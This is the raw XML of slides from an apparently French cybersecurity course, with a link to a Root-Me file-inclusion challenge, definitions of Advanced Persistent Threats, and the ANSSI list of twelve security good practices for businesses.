            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.root-me.org/fr/Challenges/Web-Serveur/Remote-File-Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6578335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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="922096"/>
            <a:ext cx="10691265" cy="1808912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – WOOCLAP</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Espace réservé du contenu 5" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B024C939-229D-7504-1100-917E5379CCD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0634" y="1759999"/>
            <a:ext cx="10691265" cy="4961476"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25315234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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548641" y="960594"/>
            <a:ext cx="6079575" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" cap="none" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187120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CBA1E484-58F1-4831-966B-BCB5CC73F2E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Qu'est-ce qu'une attaque APT ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du contenu 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{373EF8B8-CB0D-478D-94C0-18993C816183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Advanced Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ne catégorie d’attaques mettant en œuvre de nombreuses techniques d’attaques (injection SQL, XSS, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>AET (Advanced Evasion Techniques) qui est une technique dite d’évasion</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242550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EB2409-9399-495A-BD9E-3518B14293E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725AB4D0-A35C-40DD-B0C7-193AAB03664D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque dite avancée dans le sens qu’elle utilise toutes les techniques et outils pour atteindre son objectif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Multitude de composants communs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’ensemble des méthodes et outils font d’elle une attaque avancée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198439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EB2409-9399-495A-BD9E-3518B14293E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725AB4D0-A35C-40DD-B0C7-193AAB03664D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Attaque basée sur la stratégie de rester le plus longtemps possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Scénarisée par les attaquants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Objectif : rester sous les radars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335497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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les bonnes pratiques (ANSSI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="1645920"/>
            <a:ext cx="10691265" cy="4808668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Choisir avec soin ses mots de passe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mettre à jour régulièrement vos logiciels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bien connaître ses utilisateurs et ses prestataires</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Effectuer des sauvegardes régulières</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sécuriser l’accès Wi-Fi de votre entreprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Être aussi prudent avec son smartphone ou sa tablette qu’avec son ordinateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Protéger ses données lors de ses déplacements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Être prudent lors de l’utilisation de sa messagerie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Télécharger les programmes sur les sites officiels des éditeurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Être vigilant lors d’un paiement sur Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Séparer les usages personnels des usages professionnels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Prendre soin de ses informations personnelles, professionnelles et de son identité numérique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B853B525-7890-4180-A44D-40AEECF275FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6454588"/>
            <a:ext cx="9864762" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.ssi.gouv.fr/uploads/2017/01/guide_cpme_bonnes_pratiques.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1"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60116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EB2409-9399-495A-BD9E-3518B14293E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725AB4D0-A35C-40DD-B0C7-193AAB03664D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Coordination de moyens techniques et humains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Peu automatisé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Techniques inhabituelles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140598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FC2B23-306E-4E9E-9D17-B6D33C721286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Particularités des APT</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
